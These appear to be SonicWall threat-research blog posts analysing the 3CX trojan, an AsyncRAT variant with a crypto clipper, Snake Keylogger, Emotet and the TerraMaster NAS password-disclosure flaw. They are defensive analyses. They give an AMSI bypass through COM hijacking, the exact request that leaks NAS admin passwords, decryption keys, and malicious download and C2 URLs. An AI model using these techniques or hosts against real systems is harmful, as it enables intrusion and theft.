The malware enumerates through the “d3dcompiler_47.dll” PE header and retrieves the security directory offset to look for the marker bytes “FE ED FA CE FE ED FA CE“, present just before the encrypted data. The malware decrypts the encrypted data using RC4 algorithm with key “3jB(2bsG#@c7”. Initial bytes of the decrypted data are shellcode and there is a DLL payload after the shellcode:

 

Shellcode

 

The shellcode is responsible of reflectively loading the DLL in the memory and invoking it’s functions. The shellcode retrieves the API addresses by enumerating the PEB_LDR_DATA and comparing the API names with hardcoded hash values:

 

The shellcode reflectively loads the DLL in the memory but did not load the MS-DOS Stub, to prevent from being triggered suspicious, by the security software. The shellcode invokes the export function “DllGetClassObject” from the loaded DLL:

 

Payload DLL

After invoking the exported function the malware invokes another function from the payload DLL which creates a thread responsible for performing the download activities:

 

The malware has code to read and create a manifest file in the parent process directory. It generates a random number and waits in loop using sleep API which terminates based on the random number:

 

The malware reads the value of “MachineGuid” from the registry:

 

The malware tries to download data from URL “https://raw.githubusercontent.com/IconStorages/images/main/icon<integer value in range 0 to 15>.ico”. The URL was down at the time of analysis:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: MacOSX.3CX (Trojan)
  • GAV: MacOSX.3CX_1 (Trojan)
  • GAV: Dropper.3CX (Trojan)
  • GAV: Dropper.3CX_1 (Trojan)
  • GAV: Agent.3CX (Trojan)
  • GAV: Agent.3CX_1 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

SonicWall customers can also enable the following application signatures to identify the presence of the 3CX application on their systems and network:

  • 2805 => VoIP-APPS 3CX Phone System — HTTPS Activity 1
  • 2810 => VoIP-APPS 3CX Phone System — HTTPS Activity 2
  • 3451 => VoIP-APPS 3CX Phone System — UDP Activity

AsyncRAT variant includes CryptoStealer capabilites

AsyncRAT is a well known malware and widely active since last few years. However, the old variant of AysncRAT is completely destructive, in the latest variant the malware has advances its capabilities by including additional commands support from C2, clipper module, cryptostealer module, keylogger module and ability to prevent system from going to sleep. SonicWall RTDMI detects a JavaScript file which downloads and executes fileless AsyncRAT on the victim’s machine.

JavaScript

The JavaScript contains garbage comments and keeps the name of the variables larger, to make the code illegible. It downloads a VBScript from a compromised website “h[t][t]ps://dnacapitalgroup.com/wp-includes/images/information.txt” to “%Temp%\VB”, using the Windows utility tool BITSAdmin. The VBScript is launched using Windows Scripting Host by specifying the engine type as “VBScript” for executing script. Windows Script Host usually associates the script engine type based on the script extensions but the malware downloads and executes the VBScript without any extension that makes the requirement of providing the engine information explicitly:

 

The tiny and obfuscated VBScript launches a PowerShell script which further downloads and launches next layer PowerShell script:

 

PowerShell Script

The PowerShell script drops a batch script, a VBScript and 2 PowerShell scripts into “C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV”. This PowerShell script distributes the tasks among these dropped scripts to thwart detection from the security vendors. The PowerShell script starts the next layer PowerShell script TZOQCBINLOLHJQAPYIDAJV.ps1:

  • TZOQCBINLOLHJQAPYIDAJV.bat
  • TZOQCBINLOLHJQAPYIDAJV.ps1
  • TZOQCBINLOLHJQAPYIDAJV.vbs
  • YPSPPQWKQDKPVWZHQCIIQZ.ps1

TZOQCBINLOLHJQAPYIDAJV.ps1

The PowerShell script schedules a task to execute the VBScript “C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV.vbs” after every 3 minutes:

TZOQCBINLOLHJQAPYIDAJV.vbs

The obfuscated VBScript launches TZOQCBINLOLHJQAPYIDAJV.bat script:

TZOQCBINLOLHJQAPYIDAJV.bat

The batch script hijacks the Common Object Model (COM) server by making the registry entry “Computer\HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32” to a not existing DLL and bypasses Antimalware Scan Interface (AMSI) scanning for the unpatched amsi.dll. The batch script executes the next layer PowerShell script YPSPPQWKQDKPVWZHQCIIQZ.ps1:

YPSPPQWKQDKPVWZHQCIIQZ.ps1

The PowerShell script contains a loader and AsyncRAT binary bytes, encrypted using TripleDES algorithm. The PowerShell script invokes method “C” from the loader binary by passing a file path for process hollowing and AsyncRAT binary’s bytes array. The loader binary does the process hollowing in process “C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe” to execute the AsyncRAT on the victim’s machine. AMSI scanning for loader and AsyncRAT bytes buffers does not work, in unfixed variants of amsi.dll as the malware have hijacked the COM server:

 

AsyncRAT

The old variant of AsyncRAT sends the victim’s information to the C2 server, receives and executes commands. The AysncRAT is capable of receiving and executing plugin on the victim’s machine. The latest variant keeps the old functionalities and additionally we have observed below enhancements:

  • CryptoStealer module
  • Enables Clipper module
  • Enables offline keylogger
  • Threat actor’s digital wallet addresses
  • Updated group name
  • Updated hosts and ports

The latest variant uses the same mutex name, used in the old variants “AsyncMutex_6SI8OkPnk“. To prevent detection in sandbox, the malware delays the execution by sleeping 1000 milliseconds, 3 times in a loop and then decrypts configuration information using AES decryption and initializes the variables:

 

The malware contains code to check for anti analysis, anti VM, anti sandbox and make persistence entry but that is disabled using the flag values, similarly to the old variant. In this variant, the malware enables flag for offline Lime keylogger which logs the key strokes into “%temp%\log.tmp”. The malware keeps the system in active state and prevents it from going to sleep, using  Windows API SetThreadExecutionState by enabling flag values ES_CONTINUOUS, ES_SYSTEM_REQUIRED and ES_DISPLAY_REQUIRED:

 

The major change in this variant that we have observed, is inclusion of Clipper module which intends to steal crypto currencies. The Clipper module looks currency addressed using regular expression in the clipboard data which includes wallet addresses of Bitcoin, Ethereum and Tether, and replaces them with malware’s wallet addresses:

 

C2 Communication

The malware selects a random host and port from the list of host domains/IPs and ports respectively, and tries to connect with it. If the connection to the C2 server fails, the malware tries the next random combination, after a sleep of 5000 milliseconds. Once the connection with C2 sever is established, malware sends below information from the victim’s machine:

  • Packet type as “ClientInfo”
  • Hardware ID
  • Username
  • Operating System info
  • Execution path
  • Version
  • Execution mode (Admin | User)
  • Active GUI window name
  • Antivirus
  • Chrome MetaMask extension
  • Digital wallet information
    • Bitcoin core
    • Exodus
    • Atomic
    • Electrum
    • Coinomi
    • Ledger
  • Chrome Two Factor Authenticator (2FA) extension
  • Bitcoin core information
  • Exodus information
  • Executable time
  • Pong as empty string
  • Group as “newmekha”
  • Last input time

 

The malware creates 3 threads, first thread keeps sending ping messages to ensure the C2 server that the client is alive, second thread counts the time interval for the connection and third thread reads data from the C2 server.

Commands

This variant has increased the supported commands compare to the old variants. The malware receives data in an encoded and compressed message format which is decoded to get the command. Based on the received command, the message may include additional data (eg. plugin bytes, killing processes names and URL to download payload etc.). The malware supports below commands and after executing the command, the result is sent back to the C2 server.

  • ResetScale
    • Overrides Dots Per Inch (DPI) scaling using Windows API SystemParametersInfoA and sends back “Reset Scale succeeded!”.
  • passload
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • killps
    • The command includes names of comma separated processes which are terminated by the malware.
  • plugin
    • The malware receives the plugin command along with the plugin hash value. The malware checks if the plugin is already installed on the victim’s machine by looking the hash value into registry “HKEY_CURRENT_USER\Software\<HWID>“. If the plugin is already installed on the victim’s machine, the malware executes the plugin in memory else the malware sends the plugin hash value by setting the packet type to “sendPlugin“:
  • savePlugin
    • The malware receives the “savePlugin” command along with the plugin bytes and its hash value. The malware saves the compressed plugin bytes into the registry entry “HKEY_CURRENT_USER\Software\<HWID>” with value name to hash of the plugin. The plugin bytes are decompressed and invoked by the malware.
  • getscreen
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • uacoff
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • DicordTokens
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • weburl
    • The malware receives an URL, to download a payload along with the commands. The payload from the URL is downloaded into a temporary file and executed.
  • Net35
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • pong
    • The malware has registered a timer which keeps increasing the interval value. Once the malware receives pong command, the interval value is sent to the C&C server by setting the packet type to “pong”.
  • Avast
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • WDExclusion
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • KillProxy
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • gettxt
    • The malware sends the clipboard text to the C2 server.
  • klget
    • The malware sends the stolen keystrokes file which is created by the Lime keylogger.
  • backproxy
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • WebBrowserPass
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.

 

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs at the time of writing this blog indicates its uniqueness and limited distribution:

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

TerraMaster Remote Command Execution Vulnerability

TerraMaster Technology is a Chinese company that specializes in computer software, network attached storage (NAS), and direct attached storage (DAS).TerraMaster’s products are sold in more than 40 countries. Its main products are personal/home cloud storage, small/medium Business Network Storage, enterprise network storage server, home/SOHO RAID storage, video professional RAID storage.

TerraMaster NAS Remote Command Execution Vulnerability | CVE-2022-24990
TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending “User-Agent: TNAS” to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.
SonicWall Capture Labs Threat Research Team observed attackers targeting this vulnerability in the wild.

The CVSS(Common Vulnerability Scoring System) score is 7.5 with Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is none.
  • Impact of this vulnerability on data availability is none.

TerraMaster NAS devices running TOS version 4.2.29 suffer from a vulnerability which allows remote unauthenticated attackers to execute commands as root. Following is an example of a way this could be exploited.

The module webNasIPS is vulnerable due to the way it processes requests when the User-Agent is TNAS . When the ‘webNasIPS’ function of ‘mobile ‘ class is initiated by the api.php , it ignores the authentication check and returns sensitive information. The response contains information regarding password hash , TOS firmware, default gateway, interface’s IP and mac address.
The PHP object instantiation could lead to unauthenticated remote command execution with root privileges.

SonicWall Capture Labs provides protection against this threat via following signature:

  • IPS 15830:TerraMaster NAS Information Disclosure

Threat Graph

Emotet seen distributing bloated files to evade detection

  • The SonicWall Capture Labs threat research team has once again observed a surge in Emotet. This the notorious malware, which heavily targets large organizations, uses similar tactics and functionality observed in past variants. Originally a banking Trojan, Emotet has evolved into a dropper-type class of malware. It has been been spreading through malicious Microsoft Office documents via email. Initially it was using Excel 4.0 macros(XLM), currently VBA macros are used to compromise the victims’ machines. Also, this time it is using large file size (Approx. 538 MB) for evading scanners. File size is increased due to padding of extra null bytes which are basically useless.

INFECTION VECTOR

The initial infection vector is a phishing email which has office document attachment. This document file has obfuscated VBA macros. By default, the Document file is opened in protected view, with the macros disabled. To evade this, Emotet document files have one image with instructions (Figure 1) asking user to enable content. Once the user enables the content the macros are then executed in background.

SHA256: 2d59e4dbfa860a68e014227f6bd9c13945d0d474b2d183c2f07e2c7a4864b24c

 

Fig 1 : Office document in protected view with macro disabled

 

Fig 2: obfuscated macro in office document file.

 

Inside the document file, there are multiple macros which have various obfuscated functions and variable names. After debugging this macro, we were able to de-obfuscate the macros and successfully extract all the URLs which are responsible for downloading the payload.

Fig 3: After de-obfuscating macros, we can see all URL which download Payload.

 

URLs inside document file:

  • hxxps://baumart[.]lv/wp-admin/S8jHW33QU77gLz/
  • hxxp://beyond[.]psiloveyou[.]co[.]za/dR05Bvq90dvlsVBzn/?135641&c=44
  • hxxps://lisaerp[.]com/ncsA/g7zWosP/?135641&c=44
  • hxxp://3313v[.]com/ki7xh/QpSQfw9CPTFtNs4/?135641&c=44
  • hxxp://www[.]dnautik[.]com/wp-includes/UmAJjAP/
  • hxxp://melkovsky[.]com/advice/ZRSaP7QA5yTv1fZs/

These URL downloads the archive file which contains a DLL file.

SHA256: 8a674295c02e40a8bb1518752bfe3e4533eb81b5abb2efbd399dd1681d7b82ad

 

Fig 4: DLL after Extracting Archive.

 

 

Fig 5: Appended Null bytes.

This file is a bloated Emotet DLL file by appending null bytes at the overlay, actual PE size of file is in few hundred KB’s, but since null data appended at the end of file, file size increased up to few hundred MBs. (Here actual size is 667 KB and blotted file size is 538 MB)

 

DLL Analysis:

Encrypted shell code and encrypted PE file are embedded within the resource section of the binary. Encrypted PE file size is of 0x2B000 bytes.

Fig 6 : embedded encrypted PE file and shell code blob in resource.

 

It uses “LdrFindresource_u” API to find encoded resource data and LdrAccessResource API to fetch the contents of a resource data. It calls NtAllocateVirtualMemory to allocate memory so it can decrypt shell code and payload in memory. Malware uses hardcoded 0x3B size of decryption key and customized decryption loop to decrypt payload PE file and shell code.

 

Fig 7 : Decryption Key

 

Fig 8 : Decryption Loop to decrypt actual payload embedded in resource section

 

Once it completes the decryption of shell code blob then it transfers execution control to this shell code using NtQueueAPCThread and NtTestAlert. NtQueueApcThread is used to queue an APC to the current thread pool, here shell code is added as an APC to current thread.

NtTestAlert is a system call that’s related to the alerts mechanism of Windows. This system call can trigger execution of any pending APCs that thread has. Once NtTestAlert API gets called shell code will start executing.

Fig 9 : Transfers execution control to injected shell code

 

Following is a snapshot from the shell code blob where we can see strings has been pushed to stack which will be later used to resolve API addresses dynamically.

Fig 10 : start of shell code

The task of shell code is to map the DLL file in virtual memory the way process aligned in memory and start the execution of actual payload DLL.

Fig 11 : Execution of shell code started

 

Malware uses API resolving functionality where it passes hard-coded checksum of API to stack or to a register and then compute checksum from the combination of DLL name string and API name. If the checksum matches it found the name of API that it wanted to use. In Fig 11 we can see 0xBDBF9C13 which is checksum DWORD used to resolve API “LdrLoadDll”.

Following are steps It follows:

  • Pushed hardcoded Hash to register (or it would be pushed on stack )
  • Call API resolver Function.
  • Access PEB structure.
  • Access PEB_LDR_DATA from PEB structure which is at 0x18 offset in PEB.
  • Access InLoadOrderModuleList from PEB_LDR_DATA which is at 0x10 offset in PEB_LDR_DATA
  • Using InLoadOrderModuleList it accesses address where DLL got loaded in memory and its wide character name in memory.
  • It checks if export directory is present in loaded module, if not then move to next loaded module in list.
  • If export directory present, then it calculates the checksum with the DLL name.
  • It traverses loaded DLL file in memory, to access export directory and access function names RVA and add this RVA to base address of DLL.
  • It goes to last exported function name by multiplying NumberOfNames (Function Counter ) and adding function name RVA .
  • Then One by one it accesses every API name and calculates the checksum of API Name.
  • It finally adds API name checksum to DLL name checksum and compares with previously pushed hard-coded DWORD value, if it matches then malware gets API name otherwise enumerate all loaded DLL in memory.
  • If malware gets API name, it accesses exported function and read the RVA of exported Function. Then it adds RVA to the base address of DLL where it was loaded, this way it resolves all API addresses dynamically.

 

After resolving LdrLoadDll it resolves LdrGetProcedureAddress API using hardcoded DWORD checksum  0x5ED941B5h.

Fig 12 : API resolver Function which takes Hard-coded DWORD HASH and resolve API address.

 

Fig 13 : API resolver Function where traverse export directory of every module

 

It uses LdrLoadDll and LdrGetProcedureAddress to resolve following API. All this API names has been pushed on to the stack at the start of shellcode execution.

  • VirtualAlloc
  • LoadLibraryA
  • VirtualProtect
  • GetNativeSystemInfo
  • RtlAddFunctionTable
  • FlushInstructionCache

These APIs will be used to map payload DLL in memory so it can start its execution.

 

DLL Mapping Functionality In memory

  • It enumerates the section header from payload DLL file to calculate size of Image which would be in memory for DLL payload. Basically, it adds Virtual Address of each section to Raw Size of that section.
  • It allocates Memory to map DLL in memory using VirtualAlloc API then it copies first 0x400 bytes decrypted Payload DLL but it skips DOS header while coping first 0x400 bytes to newly allocated memory.

Fig 14 : copy payload header data without DOS header and without string  “This program cannot be run in DOS mode”

  • It moves each section of Payload DLL file in newly allocated memory each section on new page.
  • It changes memory protections of each section.

Fig 15 : changes protections of each section of mapped DLL in memory

  • Finally, it calls RtlAddFunctionTable to add dynamic function table to the dynamic function table list and call FlushInstructionCache API to make changes permanent.
  • It parses loaded DLL file and find out entry point of it at the start execution of DLL from Address of entry point.

It simply comes out of main entry of payload DLL and starts executing “DLLregisterServer” function from main DLL file. “DllRegisterServer” from main DLL (not the mapped payload DLL), there is “DllRegisterServer” function in injected payload as well. Objective of this function to check whether exported function of injected payload is “DllRegisterServer” or not. To check whether exported function is “DllRegsiterServer” it calculates the checksum of string “DllRegisterServer” and check with hard-coded DWORD checksum, if matches then continue its execution otherwise exits. It transfers execution to “DllRegisterServer” from the payload DLL.

Fig 16 :  check exported function is “DllRegisterServer” from injected payload DLL

 

Payload DLL file

It decodes all necessary DLL names which needs to be loaded.
Following are DLL which are loaded by payload.

  • bcrypt.dll
  • crypt32.dll
  • shell32.dll
  • shlwapi.dll
  • urlmon.dll
  • userenv.dll
  • winhttp.dll
  • wtsapi32.dll

It loads all DLLs from above list.
API Resolve Functionality in Payload DLL
It resolves windows API Address of from the hardcoded DWORD checksum and it uses almost similar functionality as is used while resolving LdrFindresource_u, LdrAccessResource in main DLL.
The difference here is for every API it passes two hardcoded checksums, one for DLL name and another for API name while previously it was passing single DOWRD checksum ( combination of DLL name and API name )

It Access PEB structure and get the InLoadOrderModuleList by traversing PEB structure and then access Name of DLL , it calculates the checksum for every DLL and matches to passed DWROD checksum.
For e.g. it compares with hard-coded hash 0xAA83E8EA to find out loaded base address for kernel32.dll
If it resolves Base address for DLL, it enumerates export directory of each loaded DLL and calculate checksum of API name and compare with hard-coded DWORD checksum. If API name found, then take RVA from export directory and add it to base address of loaded DLL.
Here function which calculates checksum for DLL name and API Name are quite complex as compare to function found in main DLL.

Fig 17 : Function which resolve API address

 

Fig 18 : Calculate checksum for API name

 

Fig 19 : Decryption loop to get encoded DLL names

The following are some API Names and their respective DWORD checksum used in payload.

6AE056F0h : memset

609FD004h : CreateEventW

87CA8415h : CreateTimerQueue

9BD9AB80h : CreateTimerQueueTimer

160FBC8Dh : WaitForMultipleObjects

0E9E794B7h: BCryptOpenAlgorithmProvider

11B5B47Ah : BCryptGenRandom

35BF9169h : BCryptCloseAlgorithmProvider

69230A13h : GetModuleFileNameW

1D50CF79h : OpenSCManagerW

32655658h : CloseServiceHandle

0ABE413E5h: CreateToolhelp32Snapshot

0C60B628h : Process32FirstW

91BB593Ah : GetCurrentProcessId

0A2188CCBh: Process32NextW

6B466D98h : GetProcessHeap

D84B3D0A : GetModuleHandleA

8B1AD334h : HeapAlloc

3434C63Dh : CloseHandle

25A83B18h : OpenProcess

0B2D79594h: QueryFullProcessImageNameW

5D2B782Fh : PathFindFileNameW

0FC917Eh : SHGetFolderPathW

305B4B5Ah : lstrlenA

0C019E25Ah: StrCmpNIW

0AE929DCDh: lstrcpyW

32C0D23Ch : SHFileOperationW

0AE9B6EABh: _snwprintf

6A53AC4Dh : DeleteFileW

0A9867BD9h: CreateProcessW

73BF5525h : kernel32_SetEvent

0D3711A37h: DeleteTimerQueueEx

9D1964ACh : kernel32_ExitProcess

661CE361h : RtlExitUserProcess

 

It checks for folder path from which process is being run, if it is not being run from %appdata\Local% directory, then it moves main DLL to %AppData\Local% directory, Regsvr32.exe spawns a child process by passing command line argument as file path of moved DLL to %AppData\Local% directory and kills the parent, becoming a ‘non-existent process’; this is an anti-analysis technique that prevents debuggers from attaching to the process.

Fig 20 : Regsvr32.exe restarted with dropped DLL as argument.

 

It sends data over internet using WinHttp API.

Fig : 21 : encoded data send over C2 server

 

 

We have found various C2 URLs, from which it performs the command-and-control activity.

C2 URL:

hxxps://91[.]121[.]146[.]47:8080/wueylobjdxujn/   

hxxps://72[.]15[.]201[.]15:8080/wueylobjdxujn/   

hxxps://187[.]63[.]160[.]88:80/wueylobjdxujn/     

hxxps://104[.]168[.]155[.]143:8080/             

hxxps://91[.]207[.]28[.]33:8080/wueylobjdxujn/     

hxxps://167[.]172[.]199[.]165:8080/wueylobjdxujn/      

hxxps://72[.]15[.]201[.]15:8080/wueylobjdxujn/     

hxxps://187[.]63[.]160[.]88:80/wueylobjdxujn/     

hxxps://164[.]90[.]222[.]65/wueylobjdxujn/     

 

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for file:

 

 

Snake Keylogger abusing Protocol Buffers seen in the wild

The SonicWall Capture Labs Research team has observed that Windows Shortcut (LNK) files are being delivered to potential victims as an email attachment which download and execute Snake keylogger. The Snake keylogger final payload is wrapped by multiple layers of protection, to thwart detection and impede analysis. This variant of Snake keylogger keeps remote host information into the Protocol Buffer which is de-serialized using protobuf-net library.

Protocol Buffers is a free and open-source cross-platform data format used to serialize structured data. It is useful in developing programs to communicate with each other over a network or for storing data.

The Snake keylogger keeps initial configuration JSON data, encrypted into the PE file resource. After decrypting the JSON data, it is de-serialized using the “Newtonsoft JSON” library. It is observed that malware authors are increasingly using genuine libraries to accomplish their tasks rather than writing their own code which makes the malware code less suspicious.

PowerShell Script

The PowerShell script contains encrypted URL which is decrypted by passing the URL to the function “sDjLksFILdkrdR”. The decryption logic is pretty simple which first reverses the complete URL then reverses each 2 bytes at time to get the actual URL. The PowerShell script downloads HTML Application (HTA) file from URL “h[t][t]p://179.43.175.187/ksjy/OBOTESKILLZDUMBCHICHI.hta” into “%APPDATA%\OBOTESKILLZDUMBCHICHI.hta”. The malware executes and deletes the downloaded HTA file:

 

HTML Application

The HTA file contains obfuscated VBScript which downloads and executs PE file from URL “h[t][t]p://179.43.175.187/ksjy/fund.exe”:

 

Layer 1

The Snake keylogger contains multiple layers of protection and most of them involves decrypting the next layer binary from its resource data. In this layer, the malware does base64 decoding on the resource data and reverses the bytes array, to get the next layer Dynamic Link Library (DLL) “Euxamuuiclre.dll”. The malware loads the next layer DLL and invokes its function “Stxogeqelkfu”:

 

Layer 2

The malware contains a compressed JSON object in the resource which is decompressed and then de-serialized using “Newtonsoft JSON” library. The JSON object contains 34 fields but we are not looking all the fields in details, as we are more interested to get the next layer binary:

The malware contains the next layer executable in json attribute “33”. The malware does base64 decoding, reverses the bytes array and does decompression to get the next layer executable:

Additionally the malware checks if it is either running inside a debugger or in a controlled environment:

 

Layer 3

The malware decompresses the resource “Kdagpwvqqwblrve”, reverses the bytes to get the next layer DLL and invokes its method “KHwfexS3b”:

 

Snake Keylogger

The malware uses Protocol Buffers library “protobuf-net.dll” to retrieve the data for class object of “blrZfRKkSGhOEXcqyNO”. The buffer data contains remote host IP address and port number:

The malware creates a mutex “5500278311” and tries to connect the remote host IP “194.55.224.98” at port number “7701”. The malware could established connection to the remote as it was down at the time of analysis:

The Snake Keylogger is known for stealing and sending below information from the victim’s machine:

  • Key logs
  • Screenshots
  • Clipboard data
  • Application data

 

The file is detected by only a few security vendors on popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential:

 

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file: